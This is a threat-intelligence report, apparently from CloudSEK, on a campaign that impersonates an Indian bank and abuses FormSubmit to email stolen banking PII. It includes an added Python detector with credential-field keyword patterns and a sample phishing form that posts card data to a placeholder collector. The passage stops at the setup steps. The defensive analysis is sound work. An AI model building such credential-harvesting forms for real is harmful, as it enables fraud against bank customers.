Scammers Misuse FormSubmit SaaS Platform to Steal PII of Indian Banking Customers
December 14, 2022
Category: Adversary Intelligence
Industry: Banking and Finance
Motivation: Financial
Region: Asia & Pacific
Executive Summary
THREAT: Scammers use a free form service that requires no code integration to forward victims’ PII to a verified email address. Using this, scammers can steal banking credentials and PII.
IMPACT: Stolen PII details can be used to fuel various social engineering campaigns. Victims can be exploited financially.
MITIGATION: Use XVigil to actively track events and take the necessary actions. Educate customers about such fraudulent activities through various social media posts.
Analysis and Attribution
CloudSEK’s contextual AI digital risk platform XVigil uncovered a phishing campaign abusing a SaaS platform, named FormSubmit, to impersonate a popular Indian bank.
FormSubmit is a no-code form service, designed to send input data from an HTML form straight to a specified email address.
This campaign was uncovered while analyzing a suspect domain which was classified as a threat by XVigil on 10 November 2022.
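A defensive check for the pattern described above, as an added example that is not from the original report: it parses a page's HTML and flags forms that send credential-like fields to a form-to-email relay on a different host. The `formsubmit.co` endpoint, the field-name hints, the `audit_page` helper and the sample page are assumptions made for illustration, not indicators from this campaign.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

# Assumption: relay hosts to watch; formsubmit.co is FormSubmit's public endpoint.
FORM_RELAY_HOSTS = {"formsubmit.co"}
# Assumption: name substrings that suggest banking credentials or PII.
SENSITIVE_HINTS = ("card", "cvv", "pin", "otp", "pass", "account", "mobile")
# Constructed sample page (not from the campaign); hosts and address are placeholders.
SAMPLE_HTML = """
<form action="https://formsubmit.co/collector@example.invalid" method="POST">
  <input name="card_number"><input name="cvv"><input name="mobile">
</form>
<form action="/search"><input name="q"></form>
"""

class FormAuditor(HTMLParser):
    """Collects each <form>'s action URL and the names of its input fields."""
    def __init__(self):
        super().__init__()
        self.forms, self._current = [], None

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self._current = {"action": a.get("action") or "", "fields": []}
            self.forms.append(self._current)
        elif tag in ("input", "select", "textarea") and self._current is not None:
            self._current["fields"].append((a.get("name") or "").lower())

    def handle_endtag(self, tag):
        if tag == "form":
            self._current = None

def audit_page(html, page_host):
    """Flag forms that post sensitive fields to a form-to-email relay off the page's own host."""
    parser = FormAuditor()
    parser.feed(html)
    findings = []
    for form in parser.forms:
        target = urlparse(form["action"])
        host = (target.hostname or "").lower()
        if not host or host == page_host.lower():
            continue  # relative or same-host action: not the relay pattern
        is_relay = any(host == r or host.endswith("." + r) for r in FORM_RELAY_HOSTS)
        sensitive = sorted({f for f in form["fields"] if any(h in f for h in SENSITIVE_HINTS)})
        if is_relay and sensitive:
            # The path after the relay host carries the recipient address or alias.
            findings.append({"relay": host, "recipient": target.path.lstrip("/"),
                             "sensitive_fields": sensitive})
    return findings
```

The `recipient` value in each finding is the string to include in an abuse report to the relay provider; the substring hints are a triage heuristic and will need tuning against real field names.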
Information from the Fake Domain
The following information was gathered from the WHOIS records:
Creation Date: 08 November 2022
Updated Date: 08 November 2022
Domain Registrar: GoDaddy
Using FormSubmit to Create a Phishing Page
FormSubmit requires no integration beyond a form designed for the website, and it can be set up in 3 steps: